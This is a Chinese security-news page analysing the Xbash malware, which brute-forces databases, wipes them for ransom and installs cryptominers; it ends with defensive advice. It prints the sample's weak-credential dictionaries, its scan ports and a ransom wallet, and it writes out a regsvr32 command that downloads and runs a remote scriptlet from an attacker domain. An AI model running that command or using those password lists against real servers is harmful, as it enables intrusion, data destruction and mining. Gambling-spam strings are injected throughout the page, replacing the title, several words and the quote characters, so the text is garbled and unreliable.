频道栏目
首页 > 安全 > 网络安全 > 正文

世界杯外围投注官网

2018-10-19 10:11:07         来源:[db:作者]  
收藏   我要投稿

一、事件背景
Unit42安全研究团队发现了一款针对Linux和Microsoft Windows服务器的新型恶意样本,Xbash拥有勒索软件和核心功能,同时它还具备自我传播的功能。Xbash主要通过攻击弱密码和未修补的漏洞进行传播。
二、样本分析
样本是用Python语言进行开发编写,然后转化为PE文件,这样主要是为了做免杀处理,同时也具备跨平台的特性。
获取到相应的样本之后,解密提取出程序中的核心PY脚本,如下所示:

1.通过http://ejectrift.censys.xyz/cidir获取公网IP地址段,然后进行端口扫描,如下所示:

扫描的端口号列表如下:
873,3306,5432,6379,27017,8161,8088,8000,8080,8888,5900,5901,5902,9900,9901,9902
2.对相应的WEB服务端口进行扫描,如下所示:

相应的端口服务,列表如下:
HTTP:8088,8000,8080,80
VNC:5900,5901,5902,9900,9901,9902
RDP:3389
Oracle:1521
Rsync:873
Mssql:1433
Mysql:306
Postgresql:5432
Redis:6379,7379
Elasticsearch:9200
Memcached:11211
Mongodb:27017
3.然后对扫描到的WEB服务,进行暴力破解,如下所示:

4.使用内置的弱世界杯体育投注平台名和密码字典,暴力破解登录相应的服务,如下所示:

相应的WEB服务列表如下:
Rsync,VNC,phpmyadmin,MySQL,postgresql,mongodb,redis
使用到的相应的弱世界杯体育投注平台名列表如下:
USER_DIC = {&世界杯外围投注官网39;mysql&世界杯外围投注官网39;: [&世界杯外围投注官网39;root&世界杯外围投注官网39;],
 &世界杯外围投注官网39;postgresql&世界杯外围投注官网39;: [&世界杯外围投注官网39;postgres&世界杯外围投注官网39;, &世界杯外围投注官网39;admin&世界杯外围投注官网39;],
 &世界杯外围投注官网39;mongodb&世界杯外围投注官网39;: [&世界杯外围投注官网39;admin&世界杯外围投注官网39;],
 &世界杯外围投注官网39;redis&世界杯外围投注官网39;: [&世界杯外围投注官网39;null&世界杯外围投注官网39;]}
弱密码列表如下:
PASSWORD_DIC = [&世界杯外围投注官网39;test&世界杯外围投注官网39;,
 &世界杯外围投注官网39;neagrle&世界杯外围投注官网39;,
 &世界杯外围投注官网39;123456&世界杯外围投注官网39;,
 &世界杯外围投注官网39;admin&世界杯外围投注官网39;,
 &世界杯外围投注官网39;root&世界杯外围投注官网39;,
 &世界杯外围投注官网39;password&世界杯外围投注官网39;,
 &世界杯外围投注官网39;123123&世界杯外围投注官网39;,
 &世界杯外围投注官网39;123&世界杯外围投注官网39;,
 &世界杯外围投注官网39;1&世界杯外围投注官网39;,
 &世界杯外围投注官网39;{user}&世界杯外围投注官网39;,
 &世界杯外围投注官网39;{user}{user}&世界杯外围投注官网39;,
 &世界杯外围投注官网39;{user}1&世界杯外围投注官网39;,
 &世界杯外围投注官网39;{user}123&世界杯外围投注官网39;,
 &世界杯外围投注官网39;{user}2016&世界杯外围投注官网39;,
 &世界杯外围投注官网39;{user}2015&世界杯外围投注官网39;,
 &世界杯外围投注官网39;{user}!&世界杯外围投注官网39;,
 &世界杯外围投注官网39;&世界杯外围投注官网39;,
 &世界杯外围投注官网39;[email protected]!!&世界杯外围投注官网39;,
 &世界杯外围投注官网39;qwa123&世界杯外围投注官网39;,
 &世界杯外围投注官网39;12345678&世界杯外围投注官网39;,
 &世界杯外围投注官网39;test&世界杯外围投注官网39;,
 &世界杯外围投注官网39;[email protected]世界杯外围投注官网&世界杯外围投注官网39;,
 &世界杯外围投注官网39;123456789&世界杯外围投注官网39;,
 &世界杯外围投注官网39;123321&世界杯外围投注官网39;,
 &世界杯外围投注官网39;1314520&世界杯外围投注官网39;,
 &世界杯外围投注官网39;666666&世界杯外围投注官网39;,
 &世界杯外围投注官网39;woaini&世界杯外围投注官网39;,
 &世界杯外围投注官网39;fuckyou&世界杯外围投注官网39;,
 &世界杯外围投注官网39;000000&世界杯外围投注官网39;,
 &世界杯外围投注官网39;1234567890&世界杯外围投注官网39;,
 &世界杯外围投注官网39;8888888&世界杯外围投注官网39;,
 &世界杯外围投注官网39;qwerty&世界杯外围投注官网39;,
 &世界杯外围投注官网39;1qaz2wsx&世界杯外围投注官网39;,
 &世界杯外围投注官网39;abc123&世界杯外围投注官网39;,
 &世界杯外围投注官网39;abc123456&世界杯外围投注官网39;,
 &世界杯外围投注官网39;1q2w3e4r&世界杯外围投注官网39;,
 &世界杯外围投注官网39;123qwe&世界杯外围投注官网39;,
 &世界杯外围投注官网39;159357&世界杯外围投注官网39;,
 &世界杯外围投注官网39;[email protected]&世界杯外围投注官网39;,
 &世界杯外围投注官网39;[email protected]&世界杯外围投注官网39;,
 &世界杯外围投注官网39;password!&世界杯外围投注官网39;,
 &世界杯外围投注官网39;[email protected]!&世界杯外围投注官网39;,
 &世界杯外围投注官网39;password1&世界杯外围投注官网39;,
 &世界杯外围投注官网39;r00t&世界杯外围投注官网39;,
 &世界杯外围投注官网39;tomcat&世界杯外围投注官网39;,
 &世界杯外围投注官网39;apache&世界杯外围投注官网39;,
 &世界杯外围投注官网39;system&世界杯外围投注官网39;]
MY_PASSWORD = [&世界杯外围投注官网39;summer&世界杯外围投注官网39;,
 &世界杯外围投注官网39;121212&世界杯外围投注官网39;,
 &世界杯外围投注官网39;jason&世界杯外围投注官网39;,
 &世界杯外围投注官网39;admin123&世界杯外围投注官网39;,
 &世界杯外围投注官网39;goodluck123&世界杯外围投注官网39;,
 &世界杯外围投注官网39;peaches&世界杯外围投注官网39;,
 &世界杯外围投注官网39;asdfghjkl&世界杯外围投注官网39;,
 &世界杯外围投注官网39;wang123456&世界杯外围投注官网39;,
 &世界杯外围投注官网39;falcon&世界杯外围投注官网39;,
 &世界杯外围投注官网39;www123&世界杯外围投注官网39;,
 &世界杯外围投注官网39;1qazxsw2&世界杯外围投注官网39;,
 &世界杯外围投注官网39;112211&世界杯外围投注官网39;,
 &世界杯外围投注官网39;fuckyou&世界杯外围投注官网39;,
 &世界杯外围投注官网39;test&世界杯外围投注官网39;,
 &世界杯外围投注官网39;silver&世界杯外围投注官网39;,
 &世界杯外围投注官网39;123456789&世界杯外围投注官网39;,
 &世界杯外围投注官网39;234567&世界杯外围投注官网39;,
 &世界杯外围投注官网39;1122334455&世界杯外围投注官网39;,
 &世界杯外围投注官网39;xxxxxx&世界杯外围投注官网39;,
 &世界杯外围投注官网39;123321&世界杯外围投注官网39;,
 &世界杯外围投注官网39;7788521&世界杯外围投注官网39;,
 &世界杯外围投注官网39;123456qaz&世界杯外围投注官网39;,
 &世界杯外围投注官网39;hunter&世界杯外围投注官网39;,
 &世界杯外围投注官网39;qwe123&世界杯外围投注官网39;,
 &世界杯外围投注官网39;123&世界杯外围投注官网39;,
 &世界杯外围投注官网39;asdf123&世界杯外围投注官网39;,
 &世界杯外围投注官网39;password&世界杯外围投注官网39;,
 &世界杯外围投注官网39;1q2w3e4r&世界杯外围投注官网39;,
 &世界杯外围投注官网39;nihao123&世界杯外围投注官网39;,
 &世界杯外围投注官网39;aaaa1111&世界杯外围投注官网39;,
 &世界杯外围投注官网39;123123&世界杯外围投注官网39;,
 &世界杯外围投注官网39;147258369&世界杯外围投注官网39;,
 &世界杯外围投注官网39;a123&世界杯外围投注官网39;,
 &世界杯外围投注官网39;123qwe&世界杯外围投注官网39;,
 &世界杯外围投注官网39;1234abcd&世界杯外围投注官网39;,
 &世界杯外围投注官网39;spider&世界杯外围投注官网39;,
 &世界杯外围投注官网39;qqaazz&世界杯外围投注官网39;,
 &世界杯外围投注官网39;qwertyuiop&世界杯外围投注官网39;,
 &世界杯外围投注官网39;1234qwer&世界杯外围投注官网39;,
 &世界杯外围投注官网39;123abc&世界杯外围投注官网39;,
 &世界杯外围投注官网39;qwer1234&世界杯外围投注官网39;,
 &世界杯外围投注官网39;mustang&世界杯外围投注官网39;,
 &世界杯外围投注官网39;123456&世界杯外围投注官网39;,
 &世界杯外围投注官网39;123456a&世界杯外围投注官网39;,
 &世界杯外围投注官网39;ww123456&世界杯外围投注官网39;,
 &世界杯外围投注官网39;1234&世界杯外围投注官网39;,
 &世界杯外围投注官网39;123456.com&世界杯外围投注官网39;,
 &世界杯外围投注官网39;football&世界杯外围投注官网39;,
 &世界杯外围投注官网39;jessica&世界杯外围投注官网39;,
 &世界杯外围投注官网39;power&世界杯外围投注官网39;,
 &世界杯外围投注官网39;q1w2e3r4t5&世界杯外围投注官网39;,
 &世界杯外围投注官网39;aaa123&世界杯外围投注官网39;,
 &世界杯外围投注官网39;passw0rd&世界杯外围投注官网39;,
 &世界杯外围投注官网39;741852&世界杯外围投注官网39;,
 &世界杯外围投注官网39;666666&世界杯外围投注官网39;,
 &世界杯外围投注官网39;123465&世界杯外围投注官网39;,
 &世界杯外围投注官网39;justin&世界杯外围投注官网39;,
 &世界杯外围投注官网39;[email protected]世界杯外围投注官网$%^&*()&世界杯外围投注官网39;,
 &世界杯外围投注官网39;12345&世界杯外围投注官网39;,
 &世界杯外围投注官网39;222222&世界杯外围投注官网39;,
 &世界杯外围投注官网39;qazwsx123&世界杯外围投注官网39;,
 &世界杯外围投注官网39;999999&世界杯外围投注官网39;,
 &世界杯外围投注官网39;abc123&世界杯外围投注官网39;,
 &世界杯外围投注官网39;tomcat&世界杯外围投注官网39;,
 &世界杯外围投注官网39;dongdong&世界杯外围投注官网39;,
 &世界杯外围投注官网39;654321&世界杯外围投注官网39;,
 &世界杯外围投注官网39;111111a&世界杯外围投注官网39;,
 &世界杯外围投注官网39;q1w2e3&世界杯外围投注官网39;,
 &世界杯外围投注官网39;dragon&世界杯外围投注官网39;,
 &世界杯外围投注官网39;1234560&世界杯外围投注官网39;,
 &世界杯外围投注官网39;1234567&世界杯外围投注官网39;,
 &世界杯外围投注官网39;asd123456&世界杯外围投注官网39;,
 &世界杯外围投注官网39;secret&世界杯外围投注官网39;,
 &世界杯外围投注官网39;abc123456&世界杯外围投注官网39;,
 &世界杯外围投注官网39;master&世界杯外围投注官网39;,
 &世界杯外围投注官网39;qq123456&世界杯外围投注官网39;,
 &世界杯外围投注官网39;1q2w3e&世界杯外围投注官网39;,

 &世界杯外围投注官网39;playboy&世界杯外围投注官网39;,
 &世界杯外围投注官网39;[email protected]&世界杯外围投注官网39;,
 &世界杯外围投注官网39;123654&世界杯外围投注官网39;,
 &世界杯外围投注官网39;88888888&世界杯外围投注官网39;,
 &世界杯外围投注官网39;12345678&世界杯外围投注官网39;,
 &世界杯外围投注官网39;orange&世界杯外围投注官网39;,
 &世界杯外围投注官网39;rabbit&世界杯外围投注官网39;,
 &世界杯外围投注官网39;jonathan&世界杯外围投注官网39;,
 &世界杯外围投注官网39;000000&世界杯外围投注官网39;,
 &世界杯外围投注官网39;qwer&世界杯外围投注官网39;,
 &世界杯外围投注官网39;admin&世界杯外围投注官网39;,
 &世界杯外围投注官网39;asdfasdf&世界杯外围投注官网39;,
 &世界杯外围投注官网39;1234567890&世界杯外围投注官网39;,
 &世界杯外围投注官网39;709394&世界杯外围投注官网39;,
 &世界杯外围投注官网39;12qwaszx&世界杯外围投注官网39;,
 &世界杯外围投注官网39;abcd1234&世界杯外围投注官网39;,
 &世界杯外围投注官网39;pass&世界杯外围投注官网39;,
 &世界杯外围投注官网39;fuck&世界杯外围投注官网39;,
 &世界杯外围投注官网39;abc12345&世界杯外围投注官网39;,
 &世界杯外围投注官网39;qweasdzxc&世界杯外围投注官网39;,
 &世界杯外围投注官网39;abcdef&世界杯外围投注官网39;,
 &世界杯外围投注官网39;superman&世界杯外围投注官网39;,
 &世界杯外围投注官网39;rainbow&世界杯外围投注官网39;,
 &世界杯外围投注官网39;11111111111&世界杯外围投注官网39;,
 &世界杯外围投注官网39;1&世界杯外围投注官网39;,
 &世界杯外围投注官网39;321&世界杯外围投注官网39;,
 &世界杯外围投注官网39;888888&世界杯外围投注官网39;,
 &世界杯外围投注官网39;1qaz2wsx&世界杯外围投注官网39;,
 &世界杯外围投注官网39;test&世界杯外围投注官网39;,
 &世界杯外围投注官网39;112233&世界杯外围投注官网39;,
 &世界杯外围投注官网39;qazwsx&世界杯外围投注官网39;,
 &世界杯外围投注官网39;welcome&世界杯外围投注官网39;,
 &世界杯外围投注官网39;4815162342&世界杯外围投注官网39;,
 &世界杯外围投注官网39;tiger&世界杯外围投注官网39;,
 &世界杯外围投注官网39;wangyang&世界杯外围投注官网39;,
 &世界杯外围投注官网39;q1w2e3r4&世界杯外围投注官网39;,
 &世界杯外围投注官网39;111111&世界杯外围投注官网39;,
 &世界杯外围投注官网39;a123456&世界杯外围投注官网39;,
 &世界杯外围投注官网39;hello&世界杯外围投注官网39;,
 &世界杯外围投注官网39;123456654321&世界杯外围投注官网39;]
PASSWORD_DIC.extend(MY_PASSWORD)
5.如果成功登录到MySQL,MongoDB,PostgreSQL等WEB服务,会删除服务器中的数据库,然后创建一个勒索信息的新数据库,并写入一条勒索信息到新的数据库表中,如下所示:
针对MongoDB数据库的勒索:

针对PostgreSQL数据库的勒索:

针对MySQL数据库的勒索,如下所示:

相应的勒索信息钱包地址和邮件地址如下:
‘Bitcoin_Address’: ’1Kss6v4eSUgP4WrYtfYGZGDoRsf74M7CMr’,
‘Email’: ‘[email protected]
6.针对内网进行扫描,获取本地网络信息,然后生成同一个子网内的IP地址列表,进行扫描,如下所示:

内网扫描的相应端口号如下所示:

端口号:6379,8161,8088,8000,8080,8888
7.利用几个相关漏洞进行传播,如下所示:
Hadoop YARN ResourceManager未经身份验证的命令执行:

ActiveMQ任意文件写入漏洞:

Redis任意文件写入和远程命令执行:

写入执行,相应的crontab,如下所示:

通过相应的漏洞进行感染其它系统的时候会同时感染相应的Window服务器,利用Windows的系统特性进行感染,相应的Windows命令如下:
regsvr32 /s /n /u /i:http://d3goboxon32grk2l.tk/reg9.sct scrobj.dll
8.写入相应的crontab自启动项,设置定时任务,从网上下载相应的挖矿脚本,如下所示:

9.下载的相应的挖矿脚本如下:

先干掉其它的Linux系统下的各种挖矿家族,包括之前的(DDG挖矿家族),然后再下载自己的挖矿程序,如下所示:

挖矿的端口号:3333,5555,7777,14444
10.Windows上的下载执行挖矿流程,设置自启动脚本reg9_sct,其实是一个PowerShell脚本,如下所示:

解密出相应脚本之后,如下所示:

再次进行解密,如下所示:

 


tmp.ps1脚本,内容如下:

解密出相应的PowerShell脚本,如下:

会下载相应的tmp.jpg恶意程序,同时设置相应的Windows计划任务,如下所示:

11.tmp.jpg是一个64位的程序,使用VMP加壳,如下所示:

经过分析是一个挖矿的程序,如下所示:

相应的挖矿操作,如下所示:

挖矿对应的字符串,如下所示:

三、解决方案
1、更改账户密码,设置强密码,避免使用统一的密码,因为统一的密码会导致一台被攻破,多台遭殃。
2、如果业务上能不使用RDP的,则建议关闭RDP。当出现此类事件时,推荐使用深信服防火墙,或者终端检测响应平台(EDR)的微隔离功能对3389等端口进行封堵,防止扩散!
3、深信服防火墙、终端检测响应平台(EDR)均有防爆破功能,防火墙开启此功能并启用相应的规则,EDR开启防爆破功能可进行防御。
4、建议对全网进行一次安全检查和杀毒扫描,加强防护工作。
5、普通世界杯体育投注平台,可下载如下工具,进行查杀。
上一篇:新Njrat木马(Bladabindi)的新功能源码分析
下一篇:幽灵间谍:TrickBot新变种运用“无文件”技术发起攻击
相关文章
图文推荐

关于我们 | 联系我们 | 服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑--致力于做实用的IT技术学习网站